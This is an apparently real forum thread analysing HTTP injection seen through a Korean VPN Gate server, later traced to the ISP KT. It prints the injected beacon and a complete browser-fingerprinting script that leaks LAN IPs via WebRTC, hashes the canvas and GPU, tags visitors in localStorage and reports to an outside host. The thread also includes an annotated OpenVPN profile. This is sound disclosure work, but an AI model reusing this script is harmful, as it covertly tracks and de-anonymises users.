Malicious server?


Malicious server?

Post by g10 » Wed Sep 08, 2021 9:04 am

I've caught one of the VPN servers tampering with a plain-HTTP (unencrypted) connection. Specifically, I was fetching the VPN Gate URL "http://www.vpngate.net/api/iphone/", which should return a CSV-formatted list of VPN servers. Instead, this is what I got:


<!-- Injected in place of the vpngate CSV. The meta refresh sends the top window back to http://www.vpngate.net/ after 2 s, while a 1x1 hidden iframe loads a beacon from 59.22.238.233. In the beacon URL, f= is base64 of the host/path that was requested ("www.vpngate.net/api/iphone/"), g= is a millisecond timestamp fixed by the injector, and h= is the client's own Date.now(); c=, a= and w= are repeated as hidden form fields by the page the beacon returns. -->
<meta http-equiv="refresh"content="2;url=http://www.vpngate.net/?"/><iframe id="f"frameborder="0"style="width:1;height:1">
</iframe><script>/* Point the hidden iframe at the beacon; nothing on this page ever delivers the content the client asked for. */document.getElementById("f").src="http://59.22.238.233/tm/?a=FF&b=ETC&c=300022963470&d=32&e=9301&f=d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv&g=1631083039933&h="+Date.now()+"&y=0&z=0&x=1&w=2021-08-26&in=9301_1537_00022038&id=20210908"</script>
If I go to that link it sends back some obfuscated JavaScript that navigates back to "http://www.vpngate.net/api/iphone/", obviously so that I wouldn't notice the difference. That link is already stale, so you won't see what I suspect is the real malicious code. However, if you change the "g" parameter to a more recent timestamp (in your browser console run "Date.now()" and use that number as the "g" value), you'll get something that looks more malicious. (If you reproduce this, fetch it with curl or in a throwaway VM rather than in a browser you normally use — the page runs script.)
<!-- Page served by the beacon when the g= timestamp is current. It is a browser-fingerprinting page: it fills the object "di" below from several async probes, reports every field to tms.das as query parameters, and then either POSTs the hidden form "fa" to nt/<id>.das or sends the top window back to the originally requested URL (decoded from the f= value). At no point does it return the vpngate CSV the client asked for. -->
<!DOCTYPE html><html><body><form id="fa"method="post"target="_top"><input type="hidden"name="c"value="300022963470"/><input type="hidden"name="f"value="d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv"/><input type="hidden" name="o" value=""/><input type="hidden"name="p"value="2021-08-26"/><input type="hidden" name="a" value="FF"/></form><script>/* Hidden form "fa": c, f, a and p repeat the c=, f=, a= and w= values of the iframe URL; o is filled from the tms.das reply just before submit. */function getFormatDate(date){var year=date.getFullYear();var month=(1+date.getMonth());month=month>=10?month:'0'+month;var day=date.getDate();day=day>=10?day:'0'+day;return year+'-'+month+'-'+day}/* Persistent visitor id in localStorage key 'siv10': {d: first-seen date, v: 'L' + 16 random digits}. isNew marks a first visit; isS marks that storage is unavailable. */var lk='siv10';var isNew=0;var isS=0;try{localStorage.getItem('t');localStorage.setItem('t','t')}catch(e){isS=1}if(isS==0&&localStorage.getItem(lk)==null){var j={'d':getFormatDate(new Date()),'v':'L'+Math.random().toString().substr(2,16)};localStorage.setItem(lk,JSON.stringify(j));isNew=1}/* Fingerprint record later sent to tms.das: p1 base64 of the requested host/path, p2/p4/I11 ids from the beacon URL, I1 WebRTC-harvested IP, I2 GPU renderer, I3 browser code ('FF', supplied by the server), I4 private-browsing flag, I5 OS, I6 visitor id, I7 first-seen date, I8 new-visitor flag, I10 canvas hash, t1 server-side timestamp, t2/t3 navigation timing. */var di={p1:'d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv',p2:'300022963470',p3:32,p4:9301,p5:'2021-08-26',p6:1,p7:0,p8:0,I1:'UN',I2:'UN',I3:'FF',I4:-1,I5:'ETC',I7:(isS==0?JSON.parse(localStorage.getItem(lk)).d:'1900-01-01'),I6:(isS==0?JSON.parse(localStorage.getItem(lk)).v:0),I8:(isS==0?isNew:0),I9:1,I10:0,I11:'9301_1537_00022038',t1:1631087344488,t2:0,t3:0,t4:0};/* f1: hand-rolled base64 decode of di.p1 (no atob), then navigate the top window to http://<decoded> — i.e. back to the page the user originally requested, so the detour goes unnoticed. */function f1(){var m1="",m2,m3,m4,m5,m6,m7,m8,m9=0,ma="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";mb=di.p1.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(m9<mb.length){m5=ma.indexOf(mb.charAt(m9++));m6=ma.indexOf(mb.charAt(m9++));m7=ma.indexOf(mb.charAt(m9++));m8=ma.indexOf(mb.charAt(m9++));m2=(m5<<2)|(m6>>4);m3=((m6&15)<<4)|(m7>>2);m4=((m7&3)<<6)|m8;m1=m1+String.fromCharCode(m2);if(m7!=64)m1=m1+String.fromCharCode(m3);if(m8!=64)m1=m1+String.fromCharCode(m4)}parent.location.href='http://'+m1}/* f2: 32-bit string hash with seed p2 (the constants 0xcc9e2d51, 0x1b873593, 0x85ebca6b, 0xc2b2ae35 look like MurmurHash3 x86_32); used below to reduce the canvas image to one number. */function f2(p1,p2){var 
m1,m2,m3,m4,m5,m6,m6,m7;m1=p1.length&3;m2=p1.length-m1;m3=p2;m5=0xcc9e2d51;m6=0x1b873593;m7=0;while(m7<m2){m6=((p1.charCodeAt(m7)&0xff))|((p1.charCodeAt(++m7)&0xff)<<8)|((p1.charCodeAt(++m7)&0xff)<<16)|((p1.charCodeAt(++m7)&0xff)<<24);++m7;m6=((((m6&0xffff)*m5)+((((m6>>>16)*m5)&0xffff)<<16)))&0xffffffff;m6=(m6<<15)|(m6>>>17);m6=((((m6&0xffff)*m6)+((((m6>>>16)*m6)&0xffff)<<16)))&0xffffffff;m3^=m6;m3=(m3<<13)|(m3>>>19);m4=((((m3&0xffff)*5)+((((m3>>>16)*5)&0xffff)<<16)))&0xffffffff;m3=(((m4&0xffff)+0x6b64)+((((m4>>>16)+0xe654)&0xffff)<<16))}m6=0;switch(m1){case 3:m6^=(p1.charCodeAt(m7+2)&0xff)<<16;case 2:m6^=(p1.charCodeAt(m7+1)&0xff)<<8;case 1:m6^=(p1.charCodeAt(m7)&0xff);m6=(((m6&0xffff)*m5)+((((m6>>>16)*m5)&0xffff)<<16))&0xffffffff;m6=(m6<<15)|(m6>>>17);m6=(((m6&0xffff)*m6)+((((m6>>>16)*m6)&0xffff)<<16))&0xffffffff;m3^=m6}m3^=p1.length;m3^=m3>>>16;m3=(((m3&0xffff)*0x85ebca6b)+((((m3>>>16)*0x85ebca6b)&0xffff)<<16))&0xffffffff;m3^=m3>>>13;m3=((((m3&0xffff)*0xc2b2ae35)+((((m3>>>16)*0xc2b2ae35)&0xffff)<<16)))&0xffffffff;m3^=m3>>>16;return m3>>>0}/* WebRTC probe: opens a PeerConnection with an empty ICE server list and reads the ICE candidates. A private-range IPv4 (10/8, 172.16/12, 192.168/16, 169.254/16) is preferred and ends the probe; otherwise the first candidate seen is kept. This can expose the LAN address of a machine that is otherwise hidden behind the VPN. */setTimeout(function(){try{var m1=window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection,m2={optional:[{}]},m3={iceServers:[{}]},m4=new m1(m3,m2),m5=/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/,m6=1}catch(e){di.I1='NS';return}function f1(p1){var m1=m5.exec(p1)[1];if(m1.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)){di.I1=m1;m4.onicecandidate=null}else if(m6){di.I1=m1;m6=0}}m4.onicecandidate=function(p1){if(p1.candidate)f1(p1.candidate.candidate)};m4.createDataChannel('');m4.createOffer(function(p1){m4.setLocalDescription(p1,function(){},function(){})},function(){})},0);/* GPU model via WEBGL_debug_renderer_info / UNMASKED_RENDERER_WEBGL, trimmed to the text between "ANGLE (" and "Direct" when present, whitespace removed. */setTimeout(function(){try{var m1=document.createElement('canvas');var m2=m1.getContext("webgl")||m1.getContext('experimental-webgl');var m3=m2.getExtension('WEBGL_debug_renderer_info');di.I2=m2.getParameter(m3.UNMASKED_RENDERER_WEBGL);var m4,m5;m4=di.I2.indexOf("ANGLE 
(",0);if(m4>-1){m4+=7;m5=di.I2.indexOf("Direct",m4);if(m5>-1){di.I2=di.I2.substr(m4,m5-m4)}}di.I2=di.I2.replace(/\s/gi,'')}catch(e){di.I2='NS'}},0);/* Canvas fingerprint: draws a fixed rectangle and text twice, then hashes the PNG data URL with f2(..., 31) into I10. */setTimeout(function(){try{var m1=document.createElement('canvas'),m2,m3="so.in<co> 2.0";m1.setAttribute("width",300);m1.setAttribute("height",200);m2=m1.getContext('2d');m2.textBaseline="top";m2.font="14px 'Arial'";m2.textBaseline="alphabetic";m2.fillStyle="#f60";m2.fillRect(125,1,62,20);m2.fillStyle="#069";m2.fillText(m3,2,15);m2.fillStyle="rgba(102, 204, 0, 0.7)";m2.fillText(m3,4,17);di.I10=f2(m1.toDataURL().replace("data:image/png;base64,",""),31)}catch(e){di.I10=-1}},0);/* Storage probe chosen by browser code (FileSystem API, indexedDB, localStorage). A failure sets I4=1 and I6='PV' — apparently a private-browsing detector. The inner f1 here is a local poll helper (10 ms ticks, gives up after 50) and is unrelated to the outer f1. */setTimeout(function(){var m1;if(window.webkitRequestFileSystem){window.webkitRequestFileSystem(window.TEMPORARY,1,function(){m1=0},function(e){m1=1})}else if((di.I3=='IE'&&document.documentMode>=10)||di.I3=='ED'){m1=0;try{if(!window.indexedDB){m1=1}}catch(e){m1=1}}else if(di.I3=='FF'&&window.indexedDB){try{var m2=window.indexedDB.open('test')}catch(e){m1=1}if(typeof m1==='undefined'){f1(function(){return m2.readyState==='done'?1:0},function(p1){if(!p1){m1=m2.result?0:1}})}}else if(di.I3=='SF'&&window.localStorage){try{window.localStorage.setItem('test',1)}catch(e){m1=1}if(typeof m1==='undefined'){m1=0}}f1(function(){return typeof m1!=='undefined'?1:0},function(){if(m1==='undefined'?0:m1?1:0){di.I4=1;di.I6='PV'}else{di.I4=0}});function f1(p1,p2){var m1=0,m2=50,m3=10,m4=0;var m5=setInterval(function(){if(p1()){window.clearInterval(m5);p2(m4)}if(m1++>m2){window.clearInterval(m5);m4=1;p2(m4)}},10)}},0);/* Chrome major version from the UA string into t4 (only when the server said the browser is 'CR'). */setTimeout(function(){var ua=navigator.userAgent.replace(/ /g,'');if(di.I3==='CR'){di.t4=(ua.match(/(chrome(?=\/))\/?\s*(\d+)/i)||[])[2]}},0);/* Windows version from the UA string (NT 5.1 .. NT 10.0) into I5; a "(compatible;" token in the UA appends "C". */setTimeout(function(){var ua=navigator.userAgent.replace(/ /g,'');if(di.I5==='ETC'||di.I5==='WIN'){if(ua.indexOf("WindowsNT5.1")!=-1){di.I5="WINXP"}else if(ua.indexOf("WindowsNT6.0")!=-1){di.I5="WINVT"}else if(ua.indexOf("WindowsNT6.1")!=-1){di.I5="WIN7"}else if(ua.indexOf("WindowsNT6.2")!=-1){di.I5="WIN8"}else 
if(ua.indexOf("WindowsNT6.3")!=-1){di.I5="WIN8.1"}else if(ua.indexOf("WindowsNT10.0")!=-1){di.I5="WIN10"}if(ua.indexOf("(compatible;")>-1){di.I5=di.I5+"C"}}},0);/* Reporting: poll every 10 ms until I6, I2 and I4 are filled in (or 10 ticks have passed), then GET tms.das with every fingerprint field as a query parameter (note the euc-kr charset on the request header). A reply of the form "0:<id>:<o>[:w:h]" puts <o> in the hidden form and POSTs it to nt/<id>.das — in the top window (with a postMessage to the parent for most browsers) or, when p6 is not 1, in a popup named N_POP. Any other reply, and the popup path afterwards, simply sends the user back to the original URL via f1(). */var m1=0,m2=setInterval(function(){if(m1>=10||(di.I6!==''&&di.I2!=='UN'&&di.I4!==-1)){clearInterval(m2);var m3,m4;if(window.XMLHttpRequest){m3=new XMLHttpRequest()}else{m3=new ActiveXObject('Microsoft.XMLHTTP')}try{m4=window.performance.timing;di.t2=m4.requestStart;di.t3=m4.responseEnd}catch(e){di.t2=di.t3=new Date().getTime()}m3.open('GET','tms.das?a='+di.I3+'&b='+di.I5+'&c='+di.p2+'&d='+di.p3+'&e='+di.p4+'&g='+di.t1+'&h='+di.t2+'&i='+di.t3+'&l='+di.I1+'&m='+di.I7+'&n='+(di.I4===1?'PV':di.I6)+'&o='+di.I8+'&p='+di.I2+"&q="+di.I9+"&r="+di.I10+"&k="+di.I11,true);m3.setRequestHeader('Content-Type','application/x-www-form-urlencoded;charset=euc-kr');m3.onreadystatechange=function(){if(m3.readyState==4&&m3.status==200){var m1=m3.responseText.split(':');if(m1[0]==='0'){var of=document.getElementById("fa");of.o.value=m1[2];of.action="nt/"+m1[1]+".das";if(di.p6===1){if(di.I3==='CR'||di.I3==='ED'||di.I3==='WH'||di.I3==='SF'||di.I3==='OP'){if(di.I3!='WH'){window.parent.postMessage({childData:'das message'},'*')}of.target='_self';of.submit()}else of.submit()}else{window.open("","N_POP","width="+m1[3]+"px,height="+m1[4]+"px,left=0,top=0");of.target="N_POP";of.submit();f1()}}else{f1()}}};m3.send()}m1++},10);</script></body></html>
The first thing I notice is that it's checking which version of the operating system it's running on (perhaps to serve tailored malware?). It's clearly going to make a request to "tms.das?..." given the right conditions. Playing around with it a little, it looks like most of the code is fingerprinting: besides the OS, it harvests the local IP address through WebRTC ICE candidates, the GPU model through WEBGL_debug_renderer_info, a hash of a rendered canvas image, a private-browsing check, and a visitor ID that it stores in localStorage (key "siv10") so the same browser can be recognised on later visits. Several of those values end up as parameters on the request (OS, graphics card, local IP, visitor ID). Notice the input variable "f" with value "d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv". If you base64-decode that value you get "www.vpngate.net/api/iphone/", which was the URL I was fetching, and the script's f1() decodes it to send you back there afterwards. So I suspect that this injection is not specific to the URL, but would try to hijack any plain http:// (non-HTTPS) request — an HTTPS response cannot be rewritten in transit like this without breaking certificate validation. Also notice that the Content-Type header is set to "application/x-www-form-urlencoded;charset=euc-kr", which is a Korean character set. This matches the fact that the VPN said it was from Korea.
Here is a cropped screenshot of the VPN in the HTML table. Notice that it has had almost 250,000 users. I wonder how many of them had plain-HTTP traffic rewritten like this.

The url used to download the openvpn config was (though it won't send the config anymore):
And the openvpn config file in case anyone wants to investigate.


# NOTE(review): profile quoted as evidence from the post above. Nothing visible in
# it is unusual for a SoftEther-generated OpenVPN profile. As the follow-up post
# concludes, the HTTP injection described happens to plaintext traffic on the
# exit side of the tunnel, so it is not caused by anything in this file and
# cannot be fixed by editing it.
###############################################################################
# OpenVPN 2.0 Sample Configuration File
# for PacketiX VPN / SoftEther VPN Server
# 
# !!! AUTO-GENERATED BY SOFTETHER VPN SERVER MANAGEMENT TOOL !!!
# 
# !!! YOU HAVE TO REVIEW IT BEFORE USE AND MODIFY IT AS NECESSARY !!!
# 
# This configuration file is auto-generated. You might use this config file
# in order to connect to the PacketiX VPN / SoftEther VPN Server.
# However, before you try it, you should review the descriptions of the file
# to determine the necessity to modify to suitable for your real environment.
# If necessary, you have to modify a little adequately on the file.
# For example, the IP address or the hostname as a destination VPN Server
# should be confirmed.
# 
# Note that to use OpenVPN 2.0, you have to put the certification file of
# the destination VPN Server on the OpenVPN Client computer when you use this
# config file. Please refer the below descriptions carefully.


###############################################################################
# Specify the type of the layer of the VPN connection.
# 
# To connect to the VPN Server as a "Remote-Access VPN Client PC",
#  specify 'dev tun'. (Layer-3 IP Routing Mode)
#
# To connect to the VPN Server as a bridging equipment of "Site-to-Site VPN",
#  specify 'dev tap'. (Layer-2 Ethernet Bridgine Mode)

dev tun


###############################################################################
# Specify the underlying protocol beyond the Internet.
# Note that this setting must be correspond with the listening setting on
# the VPN Server.
# 
# Specify either 'proto tcp' or 'proto udp'.

proto udp


###############################################################################
# The destination hostname / IP address, and port number of
# the target VPN Server.
# 
# You have to specify as 'remote <HOSTNAME> <PORT>'. You can also
# specify the IP address instead of the hostname.
# 
# Note that the auto-generated below hostname are a "auto-detected
# IP address" of the VPN Server. You have to confirm the correctness
# beforehand.
# 
# When you want to connect to the VPN Server by using TCP protocol,
# the port number of the destination TCP port should be same as one of
# the available TCP listeners on the VPN Server.
# 
# When you use UDP protocol, the port number must same as the configuration
# setting of "OpenVPN Server Compatible Function" on the VPN Server.

# Endpoint of the server the post reports; this is the address to filter on
# if you want to avoid it.
remote 222.97.105.167 1195


###############################################################################
# The HTTP/HTTPS proxy setting.
# 
# Only if you have to use the Internet via a proxy, uncomment the below
# two lines and specify the proxy address and the port number.
# In the case of using proxy-authentication, refer the OpenVPN manual.

;http-proxy-retry
;http-proxy [proxy server] [proxy port]


###############################################################################
# The encryption and authentication algorithm.
# 
# Default setting is good. Modify it as you prefer.
# When you specify an unsupported algorithm, the error will occur.
# 
# The supported algorithms are as follows:
#  cipher: [NULL-CIPHER] NULL AES-128-CBC AES-192-CBC AES-256-CBC BF-CBC
#          CAST-CBC CAST5-CBC DES-CBC DES-EDE-CBC DES-EDE3-CBC DESX-CBC
#          RC2-40-CBC RC2-64-CBC RC2-CBC
#  auth:   SHA SHA1 MD5 MD4 RMD160

# NOTE(review): the "supported" list above also includes NULL, DES, RC2 and
# MD4/MD5 — never downgrade to those; they offer no meaningful protection.
cipher AES-128-CBC
auth SHA1


###############################################################################
# Other parameters necessary to connect to the VPN Server.
# 
# It is not recommended to modify it unless you have a particular need.

# NOTE(review): no remote-cert-tls, tls-auth or tls-crypt line is present in
# this generated profile; decide whether your client should require them.
resolv-retry infinite
nobind
persist-key
persist-tun
client
verb 3
#auth-user-pass


###############################################################################
# The certificate file of the destination VPN Server.
# 
# The CA certificate file is embedded in the inline format.
# You can replace this CA contents if necessary.
# Please note that if the server certificate is not a self-signed, you have to
# specify the signer's root certificate (CA) here.

# The client trusts only this CA for the OpenVPN server certificate. That
# protects the tunnel handshake itself, not the plaintext HTTP carried inside
# the tunnel, which is what was rewritten in the post above.
<ca>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

</ca>


###############################################################################
# The client certificate file (dummy).
# 
# In some implementations of OpenVPN Client software
# (for example: OpenVPN Client for iOS),
# a pair of client certificate and private key must be included on the
# configuration file due to the limitation of the client.
# So this sample configuration file has a dummy pair of client certificate
# and private key as follows.

# NOTE(review): this keypair is a placeholder shipped inside the profile
# itself (see the comment above), so it authenticates nobody; do not reuse
# it anywhere else.
<cert>
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

</cert>

<key>
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

</key>
I don't think the connection is hijacked every time, since I've fetched the URL many times and only seen it hijacked once. It may try to do it only once, soon after connecting to the VPN, but I haven't tested that. So this is a friendly reminder that you're potentially opening yourself up to an extra MITM attack vector when using these VPNs: whoever operates the exit, and that exit's ISP, can read and modify any unencrypted traffic you send through the tunnel. I guess it's another one of those "you get what you pay for" kind of deals.


Re: Malicious server?

Post by g10 » Wed Sep 08, 2021 11:17 pm

Upon further googling and inspection, here's a packet dump from someone else who was caught by this. It shows a valid reply for the "tms.das" URL, which contains the last component of another potential URL, namely "/tm/nt/ip_T3". That URL doesn't get fetched in the dump because the first value of the returned colon-delimited data is 1; the script only POSTs the hidden form to that URL when the first value is 0.

Packet dump: https://packettotal.com/app/analysis?id ... &name=http

Googling for "tm/tms.das?a=" shows quite a few servers over many years carrying this script, and all appear to be Korean.

Here's actually a pretty decent write-up on what the script is doing (via Google Translate, because it's in Korean), and it has a way of blocking this from within the browser:

Here's a post from a user about this issue of getting redirected. It turns out that their provider KT (Korea Telecom) is the one hijacking the connection, apparently to enforce a limit on how many computers may share one subscriber line (according to that post, no more than 2).
https://translate.google.com/translate? ... ch&pto=aue

Wow, as noted in the post, this seems like it's probably illegal. This explains why this came from a Korean VPN: the host presumably has KT as their internet provider. It also means the OpenVPN config above isn't the problem — the tampering happens on the exit's network, to plain-HTTP responses, so other VPN Gate servers on KT lines might behave the same way.
